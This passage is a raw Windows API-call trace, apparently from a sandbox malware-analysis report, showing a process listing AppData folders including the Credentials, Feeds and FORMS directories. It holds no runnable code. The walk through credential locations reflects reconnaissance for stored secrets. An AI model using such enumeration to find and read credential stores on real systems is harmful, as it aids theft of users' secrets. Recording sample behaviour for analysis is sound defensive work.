nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6935d0 [0266.869] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.869] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsageLogs", cAlternateFileName="USAGEL~1")) returned 1 [0266.870] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsageLogs", cAlternateFileName="USAGEL~1")) returned 0 [0266.870] FindClose (in: hFindFile=0x6935d0 | out: hFindFile=0x6935d0) returned 1 [0266.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.870] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32", lpFilePart=0x0) returned 0x39 [0266.870] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x39 [0266.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.870] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x39 [0266.870] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\", lpFilePart=0x0) returned 0x3a [0266.871] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x693110 [0266.872] FindNextFileW (in: hFindFile=0x693110, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.872] FindNextFileW (in: hFindFile=0x693110, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0266.872] FindNextFileW (in: hFindFile=0x693110, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.872] FindClose (in: hFindFile=0x693110 | out: hFindFile=0x693110) returned 1 [0266.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.872] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x39 [0266.872] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds", lpFilePart=0x0) returned 0x33 [0266.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.872] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds", lpFilePart=0x0) returned 0x33 [0266.872] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\", lpFilePart=0x0) returned 0x34 [0266.872] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\feeds\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe3af070a, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3af070a, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.873] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe3af070a, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3af070a, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.873] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3af070a, ftCreationTime.dwHighDateTime=0x1d8598c, ftLastAccessTime.dwLowDateTime=0xe3af070a, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0x5f4c903c, ftLastWriteTime.dwHighDateTime=0x1d86028, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0266.874] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe3a50f16, ftCreationTime.dwHighDateTime=0x1d8598c, ftLastAccessTime.dwLowDateTime=0xe3a6a8c8, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3a6a8c8, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0266.874] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe3a50f16, ftCreationTime.dwHighDateTime=0x1d8598c, ftLastAccessTime.dwLowDateTime=0xe3a6a8c8, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3a6a8c8, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0266.874] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.874] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds", lpFilePart=0x0) returned 0x33 [0266.874] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache", lpFilePart=0x0) returned 0x39 [0266.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.875] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache", lpFilePart=0x0) returned 0x39 [0266.875] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\", lpFilePart=0x0) returned 0x3a [0266.875] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\feeds cache\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x430ec4ba, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe3b0c8ff, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3b0c8ff, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.875] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x430ec4ba, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe3b0c8ff, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3b0c8ff, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.875] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe3b06675, ftCreationTime.dwHighDateTime=0x1d8598c, ftLastAccessTime.dwLowDateTime=0xe3b06675, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3b06675, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8W0DVM3H", cAlternateFileName="")) returned 1 [0266.875] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xe3a55cec, ftCreationTime.dwHighDateTime=0x1d8598c, ftLastAccessTime.dwLowDateTime=0xe3a55cec, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3a55cec, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0266.876] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe3b052ba, ftCreationTime.dwHighDateTime=0x1d8598c, ftLastAccessTime.dwLowDateTime=0xe3b052ba, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3b052ba, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FAS3V05X", cAlternateFileName="")) returned 1 [0266.876] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe3b06675, ftCreationTime.dwHighDateTime=0x1d8598c, ftLastAccessTime.dwLowDateTime=0xe3b06675, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3b06675, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="K4BTRUEL", cAlternateFileName="")) returned 1 [0266.876] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe3b052ba, ftCreationTime.dwHighDateTime=0x1d8598c, ftLastAccessTime.dwLowDateTime=0xe3b052ba, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3b052ba, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MDZ024CL", cAlternateFileName="")) returned 1 [0266.876] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe3b052ba, ftCreationTime.dwHighDateTime=0x1d8598c, ftLastAccessTime.dwLowDateTime=0xe3b052ba, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3b052ba, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MDZ024CL", cAlternateFileName="")) returned 0 [0266.876] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.877] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache", lpFilePart=0x0) returned 0x39 [0266.877] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS", lpFilePart=0x0) returned 0x33 [0266.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.877] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS", lpFilePart=0x0) returned 0x33 [0266.877] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS\\", lpFilePart=0x0) returned 0x34 [0266.877] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\forms\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a17d745, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a184b86, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a184b86, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x693090 [0266.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b8) returned 1 [0266.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0266.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f184) returned 1 [0266.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f134) returned 1 [0266.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f4) returned 1 [0266.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f100) returned 1 [0266.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b8) returned 1 [0266.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0266.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f184) returned 1 [0266.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f134) returned 1 [0266.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f4) returned 1 [0266.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f100) returned 1 [0266.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.031] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\*"), lpFindFileData=0x19ee4c | out: 